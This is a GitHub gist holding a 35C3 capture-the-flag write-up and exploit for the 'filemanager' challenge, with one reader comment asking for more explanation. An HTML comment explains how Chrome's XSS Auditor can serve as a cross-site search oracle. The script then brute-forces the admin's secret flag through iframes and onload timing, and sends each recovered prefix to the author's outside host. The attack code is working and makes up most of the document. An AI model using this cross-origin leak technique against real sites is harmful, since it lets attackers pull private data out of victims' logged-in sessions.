Skip to content

Instantly share code, notes, and snippets.

@l4wio l4wio/go.html Secret
Last active Sep 3, 2019

Embed
What would you like to do?
<body>
<!--
Briefly, we all know that flag is stored as `file` in admin account. Plus, the flag is in the format: 35C3_***
When we searching content of a file, if it does exists, there is a script which doing highlight the found word by yellow <mark>
For example: https://filemanager.appspot.com/search?q=def
<h1>abc</h1>
<pre>def</pre>
<script>
(()=>{
for (let pre of document.getElementsByTagName('pre')) {
let text = pre.innerHTML;
let q = 'def';
let idx = text.indexOf(q);
pre.innerHTML = `${text.substr(0, idx)}<mark>${q}</mark>${text.substr(idx+q.length)}`;
}
})();
</script>
Okay, now let's go to XSS Auditor part.
Try this on Chrome (yea we should, since the description saying that the admin is using Chrome-headless)
view-source:https://filemanager.appspot.com/search?q=def&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b
You can see the red alert, which means that XSS-Auditor found a XSS vector on our URL (`a` param) which also showing in the page's content. But in fact, it's *NOT XSS* , this is side effect of the auditor
We leverage on its mechanism to detect whether there is search result (guessing flag) or not.
* To clarify: `a` is just foo parameter name, we just wanna make XSS-Auditor see it's as XSS vector.
But how do we do that ? Since XSS-Auditor will detect and block the page, redirect the page to `chrome-error://chromewebdata/` as well.
Now the trick comes by. by reading this post: https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning
I found out, it's possible to detect if the browser redirects to other page.
Yep, and that's all.
We can guess the flag by performing XS-Search leverage on XSS-Auditor
-->
<script>
var URL = 'https://filemanager.appspot.com/search?q={{search}}&a=%3Cscript%3E%20%20%20%20%28%28%29%3d%3E%7b%0a%20%20%20%20%20%20for%20%28let%20pre%20of%20document%2egetElementsByTagName%28%27pre%27%29%29%20%7b%0a%20%20%20%20%20%20%20%20let%20text%20%3d%20pre%2einnerHTML%3b';
var charset = '_abcdefghijklmnopqrstuvwxyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ!"#$%&\'()*+,-./:;<=>?@[\\]^`{|}~';
var brute = new URLSearchParams(location.search).get('brute') || '35C3_';
function guess(i){
var go = brute + charset[i];
var x = document.createElement('iframe');
x.name = 'blah';
var calls = 0;
x.onload = () => {
calls++;
if(calls > 1){
// so here is calling 2nd onload which means the xss auditor blocking this and the page is redirected to chrome-error://
// https://portswigger.net/blog/exposing-intranets-with-reliable-browser-based-port-scanning
console.log("GO IT ==> ",go);
location.href = 'http://deptrai.l4w.pw/35c3/go.html?brute='+escape(go);
x.onload = ()=>{};
}
var anchor = document.createElement('a');
anchor.target = x.name;
anchor.href = x.src+'#';
anchor.click();
anchor = null;
}
x.src = URL.replace('{{search}}',go);
document.body.appendChild(x);
setTimeout(() =>{
document.body.removeChild(x);
guess(i+1);
},1000);
}
guess(0);
// FLAG: 35C3_xss_auditor_for_the_win
</script>
</body>
@X-Cotang

This comment has been minimized.

Copy link

X-Cotang commented Jan 10, 2019

Hic! Pro có thể nói rõ hơn đc không?? :)) Mong đc chỉ giáo :v

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.